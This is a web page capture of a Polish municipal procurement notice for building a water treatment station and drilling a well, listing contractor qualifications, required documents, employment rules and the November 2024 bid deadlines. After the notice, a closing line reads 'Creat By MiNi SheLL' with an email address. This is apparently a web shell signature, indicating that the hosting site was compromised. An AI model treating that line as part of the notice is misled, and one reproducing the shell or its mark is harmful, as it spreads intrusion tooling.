O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia wymagań w zakresie spełnienia tego warunku.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia wymagań w zakresie spełnienia tego warunku.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia wymagań w zakresie spełnienia tego warunku.<br/>4)	zdolności technicznej lub zawodowej:<br/>ZADANIE 1 - Obowiązkiem Wykonawcy będzie powołanie kierownika budowy w specjalności konstrukcyjno-budowlanej oraz kierowników robót w branży sanitarnej oraz elektrycznej. <br/>ZADANIE 2 - Obowiązkiem Wykonawcy będzie powołanie kierownika budowy w specjalności konstrukcyjno-budowlanej oraz nadzór geologiczny. <br/>Najpóźniej 2 dni podpisaniem umowy Wykonawca dostarczy do siedziby Zamawiającego kopie uprawnień podpisane za zgodność z oryginałem przez osoby, których uprawnienia dotyczą, a także aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa w celu dokonania przez Zamawiającego zawiadomienia o zamierzonym terminie rozpoczęcia robót do Powiatowego Inspektoratu Nadzoru Budowlanego. <br/>W postępowaniu mogą wziąć udział Wykonawcy, którzy wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert (lub w okresie prowadzenia działalności, jeżeli jest ona prowadzona przez okres krótszy niż pięć lat) co najmniej dwóch robót budowlanych polegających na:<br/>ZADANIE 1- Budowie/przebudowie stacji uzdatniania wody wraz z rurociągami technologicznymi i urządzeniami towarzyszącymi o wartości minimum 3 000 000,00zł każda z 2 robót. <br/>ZADANIE 2- wymagane doświadczenie: wiercenie studni o głębokości minimum 140 m p. p. t. i wydajnością minimum 35 m3 /h z lewym obiegiem płuczki – każda z 2 studni.<br/>Za ukończone roboty budowlane zamawiający uważa roboty, dla których wystawiono i podpisano Protokół odbioru końcowego bez uwag.<br/><br/>UWAGA: Kierownik budowy oraz kierownicy robót powinni posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane oraz rozporządzeniem Ministra Inwestycji I Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. <br/>Zamawiający dopuszcza łączenie różnych funkcji dla poszczególnych osób przez jedną osobę, która spełnia łącznie warunki wymagane dla tych funkcji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału <br/>w postępowaniu Zamawiający wymaga następujących dokumentów:<br/>1.	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym Wykonawca, który złożył odrębną ofertę, ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 6 do SWZ;<br/>2.	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>3.	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>4.	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>5.	Oświadczenie dotyczące braku zakazu ubiegania się o zamówienie publiczne -załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału <br/>w postępowaniu:<br/>1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane- załącznik nr 7 do SWZ wraz z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>2)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami - załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> pracę osób wykonujących wszelkie czynności wchodzące w tzw. koszty bezpośrednie. Tak więc wymóg ten dotyczy osób, które wykonują czynności bezpośrednio związane w wykonywaniem robót czyli tzw. pracowników fizycznych. Wymóg nie dotyczy więc, między innymi osób: kierujących budową, wykonujących obsługę geodezyjną czy dostawców materiałów budowlanych. Zgodnie z art. 438 ustawy PZP dla udokumentowania tego faktu w terminie 7 dni od podpisania umowy wykonawca zobowiązany jest do przedłożenia zamawiającemu wykazu osób zatrudnionych przy realizacji zamówienia na podstawie umowy o pracę. Wykaz ten powinien zawierać co najmniej dane osobowe niezbędne do weryfikacji zatrudnienia na podstawie umowy o pracę, w szczególności imię i nazwisko pracownika, datę zawarcia umowy o pracę, rodzaj umowy o pracę, zakres obowiązków pracownika oraz wskazanie czynności jakie będą wykonywać w ramach realizacji zamówienia. Następnie na każde pisemne wezwanie Zamawiającego, wykonawca będzie zobligowany przedstawić wyżej wymieniony wykaz i dokumenty potwierdzające zatrudnienie osób na podstawie umowy o pracę przy realizacji zamówienia. W związku z powyższym wykonawca musi na każde wezwanie przedstawić Zamawiającemu i inspektorowi nadzoru dokumenty potwierdzające zatrudnianie tych osób na umowę o pracę w szczególności poświadczoną za zgodność kopię umów o pracę zatrudnionego pracownika lub oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu pracownika na podstawie umowy o pracy. Pracodawcą tych osób musi być wykonawca lub jeden ze wspólników konsorcjum, zgłoszonym zgodnie z przepisami ustawy Prawo zamówień publicznych podwykonawca lub dalszy podwykonawca. Bez przedstawienia powyższego dokumentu osoby, które muszą być zatrudnione na umowę o pracę nie będą wpuszczane na plac budowy, a więc nie będą mogły wykonywać pracy z winy Wykonawcy. Jeżeli na budowie będzie przebywać osoba nie zatrudniona na umowę o pracę co zostanie ustalone przez inspektora nadzoru, zamawiającego lub jego przedstawicieli (personel) osoba taka będzie musiała opuścić plac budowy a wykonawca zapłaci zamawiającemu tytułem kary umownej 1 000,00 zł za każdy taki przypadek. Fakt przebywania takiej osoby na budowie musi zostać potwierdzony pisemną notatką sporządzoną przez przedstawicieli Zamawiającego. Notatka nie musi być podpisana przez Wykonawcę lub jego przedstawicieli. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Możliwe zmiany umowy zostały wskazane we wzorze umowy stanowiącym załącznik nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gmina_dobrzyca</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-15 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> -

Creat By MiNi SheLL
Email: jattceo@gmail.com